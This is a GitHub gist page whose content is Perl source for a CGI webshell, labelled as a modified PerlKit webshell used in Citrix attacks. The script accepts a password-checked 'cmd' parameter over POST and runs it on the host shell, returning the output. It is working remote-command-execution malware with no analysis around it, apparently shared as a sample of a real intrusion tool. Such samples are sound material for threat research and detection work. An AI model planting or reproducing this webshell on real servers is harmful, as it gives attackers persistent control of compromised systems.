Skip to content

Instantly share code, notes, and snippets.

@rxwx rxwx/loadcolorprefs.pl Secret

Created Jun 25, 2020
Embed
What would you like to do?
Modified PerlKit webshell used in Citrix attacks
use strict;
use Digest::MD5;
my($cmd, %FORM);
$|=1;
print "Content-Type: text/html";
sub parse_parameters ($){
my %ret;
my $input = shift;
foreach my $pair(split(/&/, $input)) {
my($var, $value) = split("=", $pair, 2);
if($var) {
$value =~ s/\\\ / /g;
$value =~ s/%(..)/pack("c",hex($1))/eg;
$ret{$var} = $value;
}
}
return %ret;
}
$ENV{"REQUEST_METHOD"} =~ tr/a-z/A-Z/;
if($ENV{"REQUEST_METHOD"} eq "POST"){
read(STDIN, $cmd, $ENV{"CONTENT_LENGTH"});
%FORM = parse_parameters($cmd);
if(defined $FORM{"cmd"}){
$cmd = $FORM{"cmd"};
if(defined $FORM{"pass"}){
my $md5=Digest::MD5->new;
$md5->add($FORM{"pass"});
if($md5->hexdigest eq "<removed>"){
print "-"x80;
open(CMD,"($cmd) 2>&1 |") || print "Could not execute command";
while(<CMD>){print;}
close(CMD);
print"-"x80;
}
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.